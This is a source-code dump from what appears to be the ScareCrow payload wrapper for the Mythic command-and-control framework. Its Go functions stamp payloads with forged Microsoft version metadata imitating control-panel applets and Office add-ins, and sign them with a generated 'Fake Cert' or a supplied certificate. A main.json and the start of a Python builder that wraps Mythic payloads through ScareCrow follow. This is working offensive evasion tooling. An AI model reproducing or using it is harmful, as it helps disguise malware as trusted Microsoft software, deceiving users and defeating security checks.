743 | vi.FixedFileInfo.ProductVersion.Patch = 0
744 | vi.FixedFileInfo.ProductVersion.Major = 32
745 | vi.FixedFileInfo.ProductVersion.Minor = 0
746 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
747 | vi.StringFileInfo.ProductVersion = "32.0.0.255"
748 | vi.FixedFileInfo.FileVersion.Major = 32
749 | vi.FixedFileInfo.FileVersion.Minor = 0
750 | vi.FixedFileInfo.FileVersion.Patch = 0
751 | vi.FixedFileInfo.FileVersion.Build = 255
752 | vi.StringFileInfo.InternalName = "FlashPlayerCPLApp.cpl"
753 | }
754 | if name == "hardwarewiz" {
755 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
756 | vi.StringFileInfo.InternalName = "hdwwiz.cpl"
757 | vi.StringFileInfo.FileDescription = "Add Hardware Control Panel Applet"
758 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
759 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
760 | vi.StringFileInfo.OriginalFilename = "hdwwiz.cpl.mui"
761 | vi.FixedFileInfo.ProductVersion.Patch = 18362
762 | vi.FixedFileInfo.ProductVersion.Major = 10
763 | vi.FixedFileInfo.ProductVersion.Minor = 0
764 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
765 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
766 | vi.FixedFileInfo.FileVersion.Major = 10
767 | vi.FixedFileInfo.FileVersion.Minor = 0
768 | vi.FixedFileInfo.FileVersion.Patch = 18362
769 | vi.FixedFileInfo.FileVersion.Build = 1
770 | vi.StringFileInfo.InternalName = "hdwwiz"
771 | }
772 | if name == "inet" {
773 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
774 | vi.StringFileInfo.InternalName = "inetcpl.cpl"
775 | vi.StringFileInfo.FileDescription = "Internet Control Panel"
776 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
777 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
778 | vi.StringFileInfo.OriginalFilename = ""
779 | vi.FixedFileInfo.ProductVersion.Patch = 18362
780 | vi.FixedFileInfo.ProductVersion.Major = 10
781 | vi.FixedFileInfo.ProductVersion.Minor = 0
782 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
783 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
784 | vi.FixedFileInfo.FileVersion.Major = 10
785 | vi.FixedFileInfo.FileVersion.Minor = 0
786 | vi.FixedFileInfo.FileVersion.Patch = 18362
787 | vi.FixedFileInfo.FileVersion.Build = 1
788 | vi.StringFileInfo.InternalName = "inetcpl.cpl"
789 | }
790 | if name == "control" {
791 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
792 | vi.StringFileInfo.InternalName = "intl.cpl"
793 | vi.StringFileInfo.FileDescription = "Control Panel DLL"
794 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
795 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
796 | vi.StringFileInfo.OriginalFilename = ""
797 | vi.FixedFileInfo.ProductVersion.Patch = 18362
798 | vi.FixedFileInfo.ProductVersion.Major = 10
799 | vi.FixedFileInfo.ProductVersion.Minor = 0
800 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
801 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
802 | vi.FixedFileInfo.FileVersion.Major = 10
803 | vi.FixedFileInfo.FileVersion.Minor = 0
804 | vi.FixedFileInfo.FileVersion.Patch = 18362
805 | vi.FixedFileInfo.FileVersion.Build = 1
806 | vi.StringFileInfo.InternalName = "CONTROL"
807 | }
808 | if name == "irprop" {
809 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
810 | vi.StringFileInfo.InternalName = "irprops.cpl"
811 | vi.StringFileInfo.FileDescription = "Infrared Control Panel Applet"
812 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
813 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
814 | vi.StringFileInfo.OriginalFilename = "irprops.cpl"
815 | vi.FixedFileInfo.ProductVersion.Patch = 18362
816 | vi.FixedFileInfo.ProductVersion.Major = 10
817 | vi.FixedFileInfo.ProductVersion.Minor = 0
818 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
819 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
820 | vi.FixedFileInfo.FileVersion.Major = 10
821 | vi.FixedFileInfo.FileVersion.Minor = 0
822 | vi.FixedFileInfo.FileVersion.Patch = 18362
823 | vi.FixedFileInfo.FileVersion.Build = 1
824 | vi.StringFileInfo.InternalName = "Infrared Properties"
825 | }
826 | if name == "Game" {
827 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
828 | vi.StringFileInfo.InternalName = "joy.cpl"
829 | vi.StringFileInfo.FileDescription = "Game Controllers Control Panel Applet"
830 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
831 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
832 | vi.StringFileInfo.OriginalFilename = "JOY.CPL.MUI"
833 | vi.FixedFileInfo.ProductVersion.Patch = 18362
834 | vi.FixedFileInfo.ProductVersion.Major = 10
835 | vi.FixedFileInfo.ProductVersion.Minor = 0
836 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
837 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
838 | vi.FixedFileInfo.FileVersion.Major = 10
839 | vi.FixedFileInfo.FileVersion.Minor = 0
840 | vi.FixedFileInfo.FileVersion.Patch = 18362
841 | vi.FixedFileInfo.FileVersion.Build = 1
842 | vi.StringFileInfo.InternalName = "JOY.CPL"
843 | }
844 | if name == "inputs" {
845 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
846 | vi.StringFileInfo.InternalName = "main.cpl"
847 | vi.StringFileInfo.FileDescription = "Mouse and Keyboard Control Panel Applets"
848 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
849 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
850 | vi.StringFileInfo.OriginalFilename = "main.cpl.mui"
851 | vi.FixedFileInfo.ProductVersion.Patch = 18362
852 | vi.FixedFileInfo.ProductVersion.Major = 10
853 | vi.FixedFileInfo.ProductVersion.Minor = 0
854 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
855 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
856 | vi.FixedFileInfo.FileVersion.Major = 10
857 | vi.FixedFileInfo.FileVersion.Minor = 0
858 | vi.FixedFileInfo.FileVersion.Patch = 18362
859 | vi.FixedFileInfo.FileVersion.Build = 1
860 | vi.StringFileInfo.InternalName = "main.cpl"
861 |
862 | }
863 | if name == "mimosys" {
864 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
865 | vi.StringFileInfo.InternalName = "mmsys.dll"
866 | vi.StringFileInfo.FileDescription = "Audio Control Panel"
867 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
868 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
869 | vi.StringFileInfo.OriginalFilename = "MMSys.cpl.mui"
870 | vi.FixedFileInfo.ProductVersion.Patch = 18362
871 | vi.FixedFileInfo.ProductVersion.Major = 10
872 | vi.FixedFileInfo.ProductVersion.Minor = 0
873 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
874 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
875 | vi.FixedFileInfo.FileVersion.Major = 10
876 | vi.FixedFileInfo.FileVersion.Minor = 0
877 | vi.FixedFileInfo.FileVersion.Patch = 18362
878 | vi.FixedFileInfo.FileVersion.Build = 1
879 | vi.StringFileInfo.InternalName = "mmsys.cpl"
880 | }
881 | if name == "ncp" {
882 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
883 | vi.StringFileInfo.InternalName = "ncpa.cpl"
884 | vi.StringFileInfo.FileDescription = "Network Connections Control-Panel Stub"
885 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
886 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
887 | vi.StringFileInfo.OriginalFilename = "ncpa.cpl.mui"
888 | vi.FixedFileInfo.ProductVersion.Patch = 18362
889 | vi.FixedFileInfo.ProductVersion.Major = 10
890 | vi.FixedFileInfo.ProductVersion.Minor = 0
891 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
892 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
893 | vi.FixedFileInfo.FileVersion.Major = 10
894 | vi.FixedFileInfo.FileVersion.Minor = 0
895 | vi.FixedFileInfo.FileVersion.Patch = 18362
896 | vi.FixedFileInfo.FileVersion.Build = 1
897 | vi.StringFileInfo.InternalName = "ncpa.cpl"
898 | }
899 | if name == "power" {
900 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
901 | vi.StringFileInfo.InternalName = "powercfg.cpl"
902 | vi.StringFileInfo.FileDescription = "Power Management Configuration Control Panel Applet"
903 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
904 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
905 | vi.StringFileInfo.OriginalFilename = "POWERCFG.CPL.MUI"
906 | vi.FixedFileInfo.ProductVersion.Patch = 18362
907 | vi.FixedFileInfo.ProductVersion.Major = 10
908 | vi.FixedFileInfo.ProductVersion.Minor = 0
909 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
910 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
911 | vi.FixedFileInfo.FileVersion.Major = 10
912 | vi.FixedFileInfo.FileVersion.Minor = 0
913 | vi.FixedFileInfo.FileVersion.Patch = 18362
914 | vi.FixedFileInfo.FileVersion.Build = 1
915 | vi.StringFileInfo.InternalName = "powercfg.cpl"
916 | }
917 | if name == "speech" {
918 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
919 | vi.StringFileInfo.InternalName = "sapi.cpl"
920 | vi.StringFileInfo.FileDescription = "Speech UX Control Panel"
921 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
922 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
923 | vi.StringFileInfo.OriginalFilename = "sapi.cpl.mui"
924 | vi.FixedFileInfo.ProductVersion.Patch = 18362
925 | vi.FixedFileInfo.ProductVersion.Major = 10
926 | vi.FixedFileInfo.ProductVersion.Minor = 0
927 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
928 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
929 | vi.FixedFileInfo.FileVersion.Major = 10
930 | vi.FixedFileInfo.FileVersion.Minor = 0
931 | vi.FixedFileInfo.FileVersion.Patch = 18362
932 | vi.FixedFileInfo.FileVersion.Build = 1
933 | vi.StringFileInfo.InternalName = "sapi.cpl"
934 | }
935 |
936 | if name == "system" {
937 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
938 | vi.StringFileInfo.InternalName = "sysdm.cpl"
939 | vi.StringFileInfo.FileDescription = "System Applet for the Control Panel"
940 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
941 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
942 | vi.StringFileInfo.OriginalFilename = "sysdm.cpl.mui"
943 | vi.FixedFileInfo.ProductVersion.Patch = 18362
944 | vi.FixedFileInfo.ProductVersion.Major = 10
945 | vi.FixedFileInfo.ProductVersion.Minor = 0
946 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
947 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
948 | vi.FixedFileInfo.FileVersion.Major = 10
949 | vi.FixedFileInfo.FileVersion.Minor = 0
950 | vi.FixedFileInfo.FileVersion.Patch = 18362
951 | vi.FixedFileInfo.FileVersion.Build = 1
952 | vi.StringFileInfo.InternalName = "sysdm.cpl"
953 | }
954 | if name == "Tablet" {
955 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
956 | vi.StringFileInfo.InternalName = "TabletPC.cpl"
957 | vi.StringFileInfo.FileDescription = "Tablet PC Control Panel"
958 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
959 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
960 | vi.StringFileInfo.OriginalFilename = "tabletpc.cpl.mui"
961 | vi.FixedFileInfo.ProductVersion.Patch = 18362
962 | vi.FixedFileInfo.ProductVersion.Major = 10
963 | vi.FixedFileInfo.ProductVersion.Minor = 0
964 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
965 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
966 | vi.FixedFileInfo.FileVersion.Major = 10
967 | vi.FixedFileInfo.FileVersion.Minor = 0
968 | vi.FixedFileInfo.FileVersion.Patch = 18362
969 | vi.FixedFileInfo.FileVersion.Build = 1
970 | vi.StringFileInfo.InternalName = "TabletPC.cpl"
971 | }
972 | if name == "telephone" {
973 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
974 | vi.StringFileInfo.InternalName = "telephon.cpl"
975 | vi.StringFileInfo.FileDescription = "Telephony Control Panel"
976 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
977 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
978 | vi.StringFileInfo.OriginalFilename = "telephon.cpl.mui"
979 | vi.FixedFileInfo.ProductVersion.Patch = 18362
980 | vi.FixedFileInfo.ProductVersion.Major = 10
981 | vi.FixedFileInfo.ProductVersion.Minor = 0
982 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
983 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
984 | vi.FixedFileInfo.FileVersion.Major = 10
985 | vi.FixedFileInfo.FileVersion.Minor = 0
986 | vi.FixedFileInfo.FileVersion.Patch = 18362
987 | vi.FixedFileInfo.FileVersion.Build = 1
988 | vi.StringFileInfo.InternalName = "telephon.cpl"
989 | }
990 | if name == "datetime" {
991 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
992 | vi.StringFileInfo.InternalName = "timedate.cpl"
993 | vi.StringFileInfo.FileDescription = "Time Date Control Panel Applet"
994 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
995 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
996 | vi.StringFileInfo.OriginalFilename = "timedate.cpl.mui"
997 | vi.FixedFileInfo.ProductVersion.Patch = 18362
998 | vi.FixedFileInfo.ProductVersion.Major = 10
999 | vi.FixedFileInfo.ProductVersion.Minor = 0
1000 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
1001 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
1002 | vi.FixedFileInfo.FileVersion.Major = 10
1003 | vi.FixedFileInfo.FileVersion.Minor = 0
1004 | vi.FixedFileInfo.FileVersion.Patch = 18362
1005 | vi.FixedFileInfo.FileVersion.Build = 1
1006 | vi.StringFileInfo.InternalName = "timedate.cpl"
1007 | }
1008 | if name == "winsec" {
1009 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1010 | vi.StringFileInfo.InternalName = "wscui.cpl"
1011 | vi.StringFileInfo.FileDescription = "Security and Maintenance"
1012 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
1013 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1014 | vi.StringFileInfo.OriginalFilename = "wscui.cpl.mui"
1015 | vi.FixedFileInfo.ProductVersion.Patch = 18362
1016 | vi.FixedFileInfo.ProductVersion.Major = 10
1017 | vi.FixedFileInfo.ProductVersion.Minor = 0
1018 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
1019 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
1020 | vi.FixedFileInfo.FileVersion.Major = 10
1021 | vi.FixedFileInfo.FileVersion.Minor = 0
1022 | vi.FixedFileInfo.FileVersion.Patch = 18362
1023 | vi.FixedFileInfo.FileVersion.Build = 1
1024 | vi.StringFileInfo.InternalName = "wscui.cpl"
1025 | }
1026 | if name == "Timesheet" {
1027 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1028 | vi.StringFileInfo.InternalName = "Timesheet.xll "
1029 | vi.StringFileInfo.FileDescription = "Timesheet ToolPak"
1030 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1031 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1032 | vi.StringFileInfo.OriginalFilename = "Timesheet.xll"
1033 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1034 | vi.FixedFileInfo.ProductVersion.Major = 16
1035 | vi.FixedFileInfo.ProductVersion.Minor = 0
1036 | vi.StringFileInfo.ProductName = "Microsoft Office"
1037 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1038 | vi.FixedFileInfo.FileVersion.Major = 16
1039 | vi.FixedFileInfo.FileVersion.Minor = 0
1040 | vi.FixedFileInfo.FileVersion.Patch = 10001
1041 | vi.FixedFileInfo.FileVersion.Build = 10000
1042 | vi.StringFileInfo.InternalName = "Timesheet.xll"
1043 | }
1044 | if name == "Reports" {
1045 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1046 | vi.StringFileInfo.InternalName = "Reports.xll "
1047 | vi.StringFileInfo.FileDescription = "Report ToolPak"
1048 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1049 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1050 | vi.StringFileInfo.OriginalFilename = "Reports.xll"
1051 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1052 | vi.FixedFileInfo.ProductVersion.Major = 16
1053 | vi.FixedFileInfo.ProductVersion.Minor = 0
1054 | vi.StringFileInfo.ProductName = "Microsoft Office"
1055 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1056 | vi.FixedFileInfo.FileVersion.Major = 16
1057 | vi.FixedFileInfo.FileVersion.Minor = 0
1058 | vi.FixedFileInfo.FileVersion.Patch = 10001
1059 | vi.FixedFileInfo.FileVersion.Build = 10000
1060 | vi.StringFileInfo.InternalName = "Reports.xll"
1061 | }
1062 | if name == "Zoom" {
1063 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1064 | vi.StringFileInfo.InternalName = "Zoom.xll"
1065 | vi.StringFileInfo.FileDescription = "Zoom Addon ToolPak"
1066 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1067 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1068 | vi.StringFileInfo.OriginalFilename = "Zoom.xll"
1069 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1070 | vi.FixedFileInfo.ProductVersion.Major = 16
1071 | vi.FixedFileInfo.ProductVersion.Minor = 0
1072 | vi.StringFileInfo.ProductName = "Microsoft Office"
1073 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1074 | vi.FixedFileInfo.FileVersion.Major = 16
1075 | vi.FixedFileInfo.FileVersion.Minor = 0
1076 | vi.FixedFileInfo.FileVersion.Patch = 10001
1077 | vi.FixedFileInfo.FileVersion.Build = 10000
1078 | vi.StringFileInfo.InternalName = "Zoom.xll"
1079 | }
1080 | if name == "Updates" {
1081 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1082 | vi.StringFileInfo.InternalName = "Updates.xll "
1083 | vi.StringFileInfo.FileDescription = "Microsoft Update ToolPak"
1084 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1085 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1086 | vi.StringFileInfo.OriginalFilename = "Updates.xll"
1087 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1088 | vi.FixedFileInfo.ProductVersion.Major = 16
1089 | vi.FixedFileInfo.ProductVersion.Minor = 0
1090 | vi.StringFileInfo.ProductName = "Microsoft Office"
1091 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1092 | vi.FixedFileInfo.FileVersion.Major = 16
1093 | vi.FixedFileInfo.FileVersion.Minor = 0
1094 | vi.FixedFileInfo.FileVersion.Patch = 10001
1095 | vi.FixedFileInfo.FileVersion.Build = 10000
1096 | vi.StringFileInfo.InternalName = "Updates.xll"
1097 | }
1098 |
1099 | if name == "Calendar" {
1100 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1101 | vi.StringFileInfo.InternalName = "Calendar.xll "
1102 | vi.StringFileInfo.FileDescription = "Calendar ToolPak"
1103 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1104 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1105 | vi.StringFileInfo.OriginalFilename = "Calendar.xll"
1106 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1107 | vi.FixedFileInfo.ProductVersion.Major = 16
1108 | vi.FixedFileInfo.ProductVersion.Minor = 0
1109 | vi.StringFileInfo.ProductName = "Microsoft Office"
1110 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1111 | vi.FixedFileInfo.FileVersion.Major = 16
1112 | vi.FixedFileInfo.FileVersion.Minor = 0
1113 | vi.FixedFileInfo.FileVersion.Patch = 10001
1114 | vi.FixedFileInfo.FileVersion.Build = 10000
1115 | vi.StringFileInfo.InternalName = "Calendar.xll"
1116 | }
1117 | if name == "Memo" {
1118 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1119 | vi.StringFileInfo.InternalName = "Memo.xll "
1120 | vi.StringFileInfo.FileDescription = "Memo ToolPak"
1121 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1122 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1123 | vi.StringFileInfo.OriginalFilename = "Memo.xll"
1124 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1125 | vi.FixedFileInfo.ProductVersion.Major = 16
1126 | vi.FixedFileInfo.ProductVersion.Minor = 0
1127 | vi.StringFileInfo.ProductName = "Microsoft Office"
1128 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1129 | vi.FixedFileInfo.FileVersion.Major = 16
1130 | vi.FixedFileInfo.FileVersion.Minor = 0
1131 | vi.FixedFileInfo.FileVersion.Patch = 10001
1132 | vi.FixedFileInfo.FileVersion.Build = 10000
1133 | vi.StringFileInfo.InternalName = "Memo.xll"
1134 | }
1135 | if name == "Desk" {
1136 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1137 | vi.StringFileInfo.InternalName = "Desk.xll "
1138 | vi.StringFileInfo.FileDescription = "Office Desktop ToolPak"
1139 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1140 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1141 | vi.StringFileInfo.OriginalFilename = "Desk.xll"
1142 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1143 | vi.FixedFileInfo.ProductVersion.Major = 16
1144 | vi.FixedFileInfo.ProductVersion.Minor = 0
1145 | vi.StringFileInfo.ProductName = "Microsoft Office"
1146 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1147 | vi.FixedFileInfo.FileVersion.Major = 16
1148 | vi.FixedFileInfo.FileVersion.Minor = 0
1149 | vi.FixedFileInfo.FileVersion.Patch = 10001
1150 | vi.FixedFileInfo.FileVersion.Build = 10000
1151 | vi.StringFileInfo.InternalName = "Desk.xll"
1152 | }
1153 |
1154 | if name == "Appwiz" {
1155 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1156 | vi.StringFileInfo.InternalName = "Appwiz.xll "
1157 | vi.StringFileInfo.FileDescription = "Application Installer ToolPak"
1158 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1159 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1160 | vi.StringFileInfo.OriginalFilename = "Appwiz.xll"
1161 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1162 | vi.FixedFileInfo.ProductVersion.Major = 16
1163 | vi.FixedFileInfo.ProductVersion.Minor = 0
1164 | vi.StringFileInfo.ProductName = "Microsoft Office"
1165 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1166 | vi.FixedFileInfo.FileVersion.Major = 16
1167 | vi.FixedFileInfo.FileVersion.Minor = 0
1168 | vi.FixedFileInfo.FileVersion.Patch = 10001
1169 | vi.FixedFileInfo.FileVersion.Build = 10000
1170 | vi.StringFileInfo.InternalName = "Appwiz.xll"
1171 | }
1172 | }
1173 | vi.VarFileInfo.Translation.LangID = goversioninfo.LangID(1033)
1174 | vi.VarFileInfo.Translation.CharsetID = goversioninfo.CharsetID(1200)
1175 |
1176 | vi.Build()
1177 | vi.Walk()
1178 |
1179 | var archs []string
1180 | archs = []string{"amd64"}
1181 | for _, item := range archs {
1182 | fileout := "resource_windows.syso"
1183 | if err := vi.WriteSyso(fileout, item); err != nil {
1184 | log.Printf("Error writing syso: %v", err)
1185 | os.Exit(3)
1186 | }
1187 | }
1188 | fmt.Println("[+] Created Embedded Resource File With " + name + "'s Properties")
1189 | return name
1190 | }
1191 |
// Signer code-signs inputFile in place. The existing file is first renamed to
// inputFile+".old" and SignExecutable is then asked to write the signed result
// back to the original path (outFile).
//
// When valid is non-empty it is handed to SignExecutable together with the
// password argument (presumably the path of an existing certificate; its
// format is not visible here). Otherwise a certificate named after domain is
// generated, packaged into domain+".pfx" under a freshly generated password,
// and used for signing.
//
// The domain+".pem"/".key"/".pfx" files are removed in both branches even
// though only the else branch creates them; the error returns of os.Rename and
// os.Remove are discarded, so a failed rename is not reported and
// SignExecutable is still invoked with a path that may not exist.
func Signer(domain string, password string, valid string, inputFile string) {
outFile := inputFile

if valid != "" {
fmt.Println("[*] Signing " + inputFile + " With a Valid Cert " + valid)
// Return value (error) ignored: the rename is assumed to succeed.
os.Rename(inputFile, inputFile+".old")
inputFile = inputFile + ".old"
SignExecutable(password, valid, inputFile, outFile)

} else {
// NOTE: this `:=` declares a new variable that shadows the `password`
// parameter for the rest of this branch; the caller's value is unused here.
password := VarNumberLength(8, 12)
pfx := domain + ".pfx"
fmt.Println("[*] Signing " + inputFile + " With a Fake Cert")
// Return value (error) ignored, as in the branch above.
os.Rename(inputFile, inputFile+".old")
inputFile = inputFile + ".old"
// NOTE(review): GenerateCert receives the renamed ".old" path as its second
// argument — confirm against GenerateCert's signature that this is intended.
GenerateCert(domain, inputFile)
GeneratePFK(password, domain)
SignExecutable(password, pfx, inputFile, outFile)
}

// Best-effort cleanup of the generated key material; errors (including
// "file does not exist" in the valid-cert branch) are ignored.
os.Remove(domain + ".pem")
os.Remove(domain + ".key")
os.Remove(domain + ".pfx")
fmt.Println("[+] Signed File Created")

}
1218 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/main.json:
--------------------------------------------------------------------------------
1 | {
2 | "FixedFileInfo": {
3 | "FileVersion": {
4 | "Major": 1,
5 | "Minor": 0,
6 | "Patch": 0,
7 | "Build": 0
8 | },
9 | "ProductVersion": {
10 | "Major": 1,
11 | "Minor": 0,
12 | "Patch": 0,
13 | "Build": 0
14 | }
15 | },
16 | "StringFileInfo": {
17 | "CompanyName": "Microsoft Corporation",
18 | "FileDescription": "Microsoft Corporation",
19 | "FileVersion": "Microsoft Corporation",
20 | "InternalName": "test",
21 | "LegalCopyright": "Microsoft Corporation",
22 | "OriginalFilename": "Microsoft Corporation",
23 | "ProductName": "Microsoft Corporation",
24 | "ProductVersion": "Microsoft Corporation"
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/mythic/agent_functions/__init__.py:
--------------------------------------------------------------------------------
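import glob
from os.path import basename


def _module_names(paths):
    """Return importable module names for the given ``*.py`` file paths.

    Each path is reduced to its base name without the ``.py`` suffix. The
    package's own ``__init__.py`` is left out. The original filter compared
    the full path (``agent_functions/__init__.py``) against the bare name
    ``__init__.py`` and therefore never excluded it, so ``__init__`` ended up
    in ``__all__``.

    :param paths: iterable of file paths ending in ``.py``
    :return: list of module names, in the order the paths were given
    """
    return [basename(p)[:-3] for p in paths if basename(p) != "__init__.py"]


# Get file paths of all modules.
# NOTE(review): the pattern is resolved against the process's current working
# directory, not against this file's location — confirm the service is always
# started from the directory that contains ``agent_functions/``.
modules = glob.glob("agent_functions/*.py")
__all__ = _module_names(modules)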
7 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/mythic/agent_functions/builder.py:
--------------------------------------------------------------------------------
import asyncio
import base64
import os
import shlex
import shutil
import tempfile
from distutils.dir_util import copy_tree

from mythic_payloadtype_container.PayloadBuilder import *
from mythic_payloadtype_container.MythicCommandBase import *
8 |
9 |
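class ScarecrowWrapper(PayloadType):
    """Mythic wrapper payload type that runs ScareCrow over a wrapped payload.

    The wrapped payload (delivered base64-encoded in ``self.wrapped_payload``)
    is written into a scratch copy of ``agent_code``, ScareCrow is built and
    invoked there with the operator-chosen build parameters, and the first
    expected output file that exists is returned as the new payload.
    """

    name = "scarecrow_wrapper"
    file_extension = "exe"
    author = "Kyle Avery"
    supported_os = [SupportedOS.Windows]
    wrapper = True
    wrapped_payloads = []
    note = ""
    supports_dynamic_loading = False
    build_parameters = {
        "loader": BuildParameter(
            name="loader",
            parameter_type=BuildParameterType.ChooseOne,
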